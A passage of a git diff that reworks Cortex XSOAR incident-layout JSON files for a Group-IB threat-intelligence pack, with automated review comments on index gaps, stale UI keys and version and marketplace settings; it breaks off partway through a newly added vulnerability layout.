"sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + 
"sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-ba6f3aa0-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "05afc160-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreattitle", + "height": 22, + "id": "0ad0ed40-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatcountries", + "height": 22, + "id": "114f3820-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 2, + 
"sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatdescription", + "height": 44, + "id": "24719880-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatexpertises", + "height": 22, + "id": "27444080-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibistailored", + "height": 22, + "id": "2b856ca0-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatactorlabels", + "height": 22, + "id": "2e55cab0-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatlangs", + "height": 22, + "id": "31343280-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatregions", + "height": 22, + "id": "340d4320-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatreportnumber", + "height": 22, + "id": "37de6f60-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibnationstatecybercriminalsthreatsectors", + "height": 22, + "id": "3efeedb0-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "2a2c25d0-8493-11ef-87c7-cfae65ac92d0", + "index": 11, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 6 + 
}, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-bb23e4a0-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "e05eaf70-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "e40b63c0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "e67cd8f0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "e8d76ac0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-bbeb5350-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibnationstatecybercriminalforumstable", + "height": 22, + "id": "ae4647d0-822f-11ef-9517-e9064fff04ea", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Cybercriminal Forum Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-c55e4d20-71ac-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorcountry", + "height": 22, + "id": "d0ccefe0-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "d45be300-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": 
"gibthreatactorisapt", + "height": 22, + "id": "d6e15560-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "d95da000-71ac-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-6acad460-7bfb-11ef-96a8-77b28953dd87", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatecreatedat", + "height": 22, + "id": "16f59990-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "19d93180-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "1f038520-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatepublished", + "height": 22, + "id": "219ca690-71ad-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, + "y": 4 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Nation-State Cybercriminals Threat Layout", + "name": "GIB Nation-State 
Cybercriminals Threat Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json index 7dcfa422b3f0..eba2068f5639 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Git_Leak_Layout.json @@ -58,7 +58,7 @@ "fieldId": "sourcebrand", "height": 22, "id": "incident-sourceBrand-field", - "index": 4, + "index": 3, "sectionItemType": "field", "startCol": 0 }, @@ -67,7 +67,7 @@ "fieldId": "sourceinstance", "height": 22, "id": "incident-sourceInstance-field", - "index": 5, + "index": 4, "sectionItemType": "field", "startCol": 0 }, @@ -76,7 +76,7 @@ "fieldId": "playbookid", "height": 22, "id": "incident-playbookId-field", - "index": 6, + "index": 5, "sectionItemType": "field", "startCol": 0 } @@ -86,7 +86,8 @@ "static": false, "w": 1, "x": 0, - "y": 0 + "y": 0, + "maxW": 3 }, { "h": 2, @@ -97,7 +98,8 @@ "type": "notes", "w": 1, "x": 2, - "y": 0 + "y": 0, + "maxW": 3 }, { "displayType": "ROW", @@ -109,7 +111,8 @@ "type": "workplan", "w": 1, "x": 1, - "y": 0 + "y": 0, + "maxW": 3 }, { "displayType": "ROW", @@ -122,7 +125,8 @@ "type": "linkedIncidents", "w": 1, "x": 1, - "y": 8 + "y": 12, + "maxW": 3 }, { "displayType": "ROW", @@ -134,7 +138,8 @@ "type": "childInv", "w": 1, "x": 2, - "y": 4 + "y": 6, + "maxW": 3 }, { "displayType": "ROW", @@ -145,8 +150,9 @@ "static": false, "type": "evidence", "w": 1, - "x": 2, - "y": 2 + "x": 1, + "y": 8, + "maxW": 3 }, { "displayType": "ROW", @@ -159,7 +165,8 @@ "type": "team", "w": 1, "x": 2, - "y": 6 + "y": 8, + "maxW": 3 }, { "displayType": "ROW", 
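Review bot: The Case Details section of the new layout numbers its items 0, 1, 2, 4, 5, 6, leaving index 3 unused, while the very next hunk in this same commit renumbers exactly those three items to 3, 4, 5 in GIB_OSI_Git_Leak_Layout.json; a newly added file should start from the corrected numbering rather than re-introduce the gap. Change `"index": 4` to `"index": 3` on incident-sourceBrand-field, `"index": 5` to `"index": 4` on incident-sourceInstance-field and `"index": 6` to `"index": 5` on incident-playbookId-field. The same 0, 1, 2, 4, 5, 6 sequence appears in the GIB_OSI_Vulnerability_Layout.json file added further down this patch, so it looks like a shared template that should be fixed once.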
@@ -173,7 +180,8 @@ "type": "indicators", "w": 2, "x": 0, - "y": 6 + "y": 10, + "maxW": 3 }, { "displayType": "CARD", @@ -231,7 +239,8 @@ "static": false, "w": 1, "x": 0, - "y": 4 + "y": 8, + "maxW": 3 }, { "displayType": "ROW", @@ -272,7 +281,8 @@ "static": false, "w": 1, "x": 0, - "y": 8 + "y": 12, + "maxW": 3 }, { "displayType": "CARD", 
@@ -295,101 +305,146 @@ "static": false, "w": 1, "x": 1, - "y": 4 + "y": 6, + "maxW": 3 }, { - "description": "", "displayType": "ROW", "h": 2, "hideName": false, - "i": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", + "i": "caseinfoid-9aa853c0-71a5-11ef-8c49-f9d8b5e80cf6", "items": [ { - "endCol": 4, - "fieldId": "gibdateofdetection", + "endCol": 2, + "fieldId": "gibadmiraltycode", "height": 22, - "id": "9d3533a0-72c7-11eb-9bde-efbce7414b24", + "id": "0e02d070-71a6-11ef-8c49-f9d8b5e80cf6", "index": 0, "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", - "endCol": 4, - "fieldId": "gibseverity", + "endCol": 2, + "fieldId": "gibcredibility", "height": 22, - "id": "ccadc250-72c7-11eb-9bde-efbce7414b24", + "id": "149c6b80-71a6-11ef-8c49-f9d8b5e80cf6", "index": 1, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "1a589ee0-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "20407620-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-9f3b9780-71a5-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "adaddd50-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, "fieldId": "gibleakedfilename", "height": 22, - "id": "b14a4640-7368-11eb-8aef-c39e29f029fe", + "id": "b4695840-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibgitsource", + "height": 22, + 
"id": "aea81fd0-765b-11ef-847d-79ba38ba7b17", "index": 2, "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", - "endCol": 4, - "fieldId": "gibportallink", + "endCol": 6, + "fieldId": "gibsource", "height": 22, - "id": "daf41620-72c7-11eb-9bde-efbce7414b24", + "id": "b9f1f880-71a5-11ef-8c49-f9d8b5e80cf6", "index": 3, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibrepository", + "endCol": 6, + "fieldId": "gibdateofdetection", "height": 22, - "id": "d02523a0-7368-11eb-8aef-c39e29f029fe", + "id": "c2572bd0-71a5-11ef-8c49-f9d8b5e80cf6", "index": 4, "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibsource", + "endCol": 6, + "fieldId": "gibdatecreated", "height": 22, - "id": "d296ab00-72c7-11eb-9bde-efbce7414b24", + "id": "c8a035e0-71a5-11ef-8c49-f9d8b5e80cf6", "index": 5, "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", - "endCol": 4, - "fieldId": "gibid", + "endCol": 6, + "fieldId": "gibportallink", "height": 22, - "id": "5ff80ed0-72c8-11eb-9bde-efbce7414b24", + "id": "4716a4e0-8493-11ef-87c7-cfae65ac92d0", "index": 6, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibrevisions", - "height": 44, - "id": "e3b4c4c0-7368-11eb-8aef-c39e29f029fe", - "index": 7, + "endCol": 6, + "fieldId": "gibosigitrepositoryfilestable", + "height": 106, + "id": "c5739110-7f19-11ef-8d06-c9295e097527", + "index": 8, "sectionItemType": "field", "startCol": 0 } ], "maxW": 3, "minH": 1, - "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from Group-IB", "static": false, - "w": 2, + "w": 3, "x": 0, "y": 2 } @@ -428,6 +483,5 @@ "name": "GIB OSI Git Leak Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "0.0.0" } \ No newline at end of file 
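Review bot: In the rebuilt "Information from Group-IB" section the item indexes run 0 through 6 and then jump to 8 for gibosigitrepositoryfilestable, because the removed gibrevisions item held index 7 and nothing took its place; use `"index": 7` so the ordering stays contiguous like the rest of the section. The section also drops gibrepository and gibrevisions in favour of gibgitsource and the repository-files table; if the mapper still populates the old fields, the release notes should say where the revision data now appears so analysts do not lose it when the layout no longer shows it.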
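Review bot: `"fromVersion": "0.0.0"` replaces the previous 6.0.0 floor and the removed `"marketplaces": ["xsoar"]` line, which together declare this layout compatible with every server version and marketplace, while the layouts added in this same commit (e.g. GIB Nation-State Cybercriminals Threat Layout) set `"fromVersion": "6.10.0"`. The rebuilt section relies on the same table-type fields (gibosigitrepositoryfilestable) as those new layouts, so it is unlikely to work on servers older than they require; set `"fromVersion": "6.10.0"` here as well. If dropping the marketplaces restriction is intentional, the commit message should say so, since it changes where the pack is published.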
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json index 045318c29638..6536df8300de 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Public_Leak_Layout.json @@ -86,7 +86,8 @@ "static": false, "w": 1, "x": 0, - "y": 0 + "y": 0, + "maxW": 3 }, { "h": 2, @@ -97,7 +98,8 @@ "type": "notes", "w": 1, "x": 2, - "y": 0 + "y": 0, + "maxW": 3 }, { "displayType": "ROW", @@ -109,7 +111,8 @@ "type": "workplan", "w": 1, "x": 1, - "y": 0 + "y": 0, + "maxW": 3 }, { "displayType": "ROW", @@ -122,7 +125,8 @@ "type": "linkedIncidents", "w": 1, "x": 1, - "y": 8 + "y": 14, + "maxW": 3 }, { "displayType": "ROW", @@ -134,7 +138,8 @@ "type": "childInv", "w": 1, "x": 2, - "y": 4 + "y": 10, + "maxW": 3 }, { "displayType": "ROW", @@ -146,7 +151,8 @@ "type": "evidence", "w": 1, "x": 2, - "y": 2 + "y": 8, + "maxW": 3 }, { "displayType": "ROW", @@ -158,8 +164,9 @@ "static": false, "type": "team", "w": 1, - "x": 2, - "y": 6 + "x": 0, + "y": 8, + "maxW": 3 }, { "displayType": "ROW", @@ -173,7 +180,8 @@ "type": "indicators", "w": 2, "x": 0, - "y": 6 + "y": 12, + "maxW": 3 }, { "displayType": "CARD", @@ -183,7 +191,7 @@ { "endCol": 1, "fieldId": "occurred", - "height": 22, + "height": 53, "id": "incident-occurred-field", "index": 0, "sectionItemType": "field", @@ -192,7 +200,7 @@ { "endCol": 1, "fieldId": "dbotmodified", - "height": 22, + "height": 53, "id": "incident-modified-field", "index": 1, "sectionItemType": "field", @@ -201,7 +209,7 @@ { "endCol": 2, "fieldId": "dbotduedate", - "height": 22, + "height": 53, "id": "incident-dueDate-field", "index": 2, "sectionItemType": "field", 
@@ -210,7 +218,7 @@ { "endCol": 2, "fieldId": "dbotcreated", - "height": 22, + "height": 53, "id": "incident-created-field", "index": 0, "sectionItemType": "field", @@ -219,7 +227,7 @@ { "endCol": 2, "fieldId": "dbotclosed", - "height": 22, + "height": 53, "id": "incident-closed-field", "index": 1, "sectionItemType": "field", @@ -231,7 +239,8 @@ "static": false, "w": 1, "x": 0, - "y": 4 + "y": 10, + "maxW": 3 }, { "displayType": "ROW", @@ -272,7 +281,8 @@ "static": false, "w": 1, "x": 0, - "y": 8 + "y": 14, + "maxW": 3 }, { "displayType": "CARD", 
@@ -295,101 +305,141 @@ "static": false, "w": 1, "x": 1, - "y": 4 + "y": 10, + "maxW": 3 }, { - "description": "", "displayType": "ROW", "h": 2, "hideName": false, - "i": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", + "i": "caseinfoid-3e13a780-71a6-11ef-8c49-f9d8b5e80cf6", "items": [ { - "endCol": 4, - "fieldId": "gibdatecreated", + "endCol": 2, + "fieldId": "gibadmiraltycode", "height": 22, - "id": "998326e0-7371-11eb-8aef-c39e29f029fe", + "id": "89b512f0-71a6-11ef-8c49-f9d8b5e80cf6", "index": 0, "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibseverity", + "endCol": 2, + "fieldId": "gibcredibility", "height": 22, - "id": "ccadc250-72c7-11eb-9bde-efbce7414b24", + "id": "9228c530-71a6-11ef-8c49-f9d8b5e80cf6", "index": 1, "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibdatahash", + "endCol": 2, + "fieldId": "gibreliability", "height": 22, - "id": "9f22aa80-7371-11eb-8aef-c39e29f029fe", + "id": "9839cf50-71a6-11ef-8c49-f9d8b5e80cf6", "index": 2, "sectionItemType": "field", "startCol": 0 }, { - "endCol": 4, - "fieldId": "gibid", + "endCol": 2, + "fieldId": "gibseverity", "height": 22, - "id": "5ff80ed0-72c8-11eb-9bde-efbce7414b24", + "id": "9dfda3d0-71a6-11ef-8c49-f9d8b5e80cf6", "index": 3, "sectionItemType": "field", "startCol": 0 - }, + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 6, + "hideName": false, + "i": "caseinfoid-3ee4b320-71a6-11ef-8c49-f9d8b5e80cf6", + "items": [ { "dropEffect": "move", - "endCol": 4, - "fieldId": "gibportallink", + "endCol": 6, + "fieldId": "gibid", "height": 22, - "id": "daf41620-72c7-11eb-9bde-efbce7414b24", - "index": 4, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", + "id": "55c44290-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "listId": "caseinfoid-3ee4b320-71a6-11ef-8c49-f9d8b5e80cf6", "sectionItemType": "field", "startCol": 
0 }, { - "endCol": 4, - "fieldId": "gibleakeddata", - "height": 44, - "id": "b696b1c0-7371-11eb-8aef-c39e29f029fe", - "index": 5, + "endCol": 6, + "fieldId": "gibdatecreated", + "height": 22, + "id": "624e6770-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 1, "sectionItemType": "field", "startCol": 0 }, { "dropEffect": "move", - "endCol": 4, - "fieldId": "giblinklist", + "endCol": 6, + "fieldId": "gibleakeddata", "height": 44, - "id": "c64b1480-7371-11eb-8aef-c39e29f029fe", + "id": "680c4880-71a6-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "listId": "caseinfoid-3ee4b320-71a6-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdatahash", + "height": 22, + "id": "4c981e80-8088-11ef-a600-b99923f2ff53", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "53e63730-8493-11ef-87c7-cfae65ac92d0", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibmatchestable", + "height": 106, + "id": "0b598b20-8088-11ef-a600-b99923f2ff53", "index": 6, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", - "endCol": 4, - "fieldId": "gibmatches", - "height": 44, - "id": "d827d580-7371-11eb-8aef-c39e29f029fe", + "endCol": 6, + "fieldId": "giblinklisttable", + "height": 106, + "id": "152b6dd0-8088-11ef-a600-b99923f2ff53", "index": 7, - "listId": "caseinfoid-34740850-72c7-11eb-9bde-efbce7414b24", "sectionItemType": "field", "startCol": 0 } ], "maxW": 3, "minH": 1, - "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from Group-IB", "static": false, - "w": 2, + "w": 3, "x": 0, "y": 2 } @@ -428,6 +478,5 @@ "name": "GIB OSI Public Leak Layout", "system": false, "version": -1, - "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "fromVersion": "0.0.0" } \ No newline at end of file 
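Review bot: The rebuilt "Information from Group-IB" section keeps UI drag artefacts on two of its items — `"dropEffect": "move"` and `"listId": "caseinfoid-3ee4b320-71a6-11ef-8c49-f9d8b5e80cf6"` on gibid and gibleakeddata — while the other five items carry neither key, and the item indexes skip 5 (0 through 4, then 6 and 7); drop the two stale keys and renumber gibmatchestable to `"index": 5` and giblinklisttable to `"index": 6`. Separately, gibleakeddata presumably renders the leaked content returned by the feed verbatim at full width (endCol 6, height 44) on the default Incident Info tab, so anyone with read access to the incident sees it; worth confirming that is intended and, if the payload can contain credentials or other sensitive material, whether the field should be truncated or moved off the default tab.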
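Review bot: `"fromVersion": "0.0.0"` replaces the previous 6.0.0 floor and the removed `"marketplaces": ["xsoar"]` line, declaring this layout compatible with every server version and marketplace, while the layouts added in this same commit use `"fromVersion": "6.10.0"`. The rebuilt section uses the same table-type fields (gibmatchestable, giblinklisttable) as those new layouts, so it should carry the same floor: `"fromVersion": "6.10.0"`. If removing the marketplaces restriction is deliberate, the commit message should state it, since it changes where the pack is published.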
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Vulnerability_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Vulnerability_Layout.json new file mode 100644 index 000000000000..bf8fc6d1dae5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_OSI_Vulnerability_Layout.json 
@@ -0,0 +1,652 @@ +{ + "description": "Layout for GIB OSI Vulnerability", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + 
"maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + 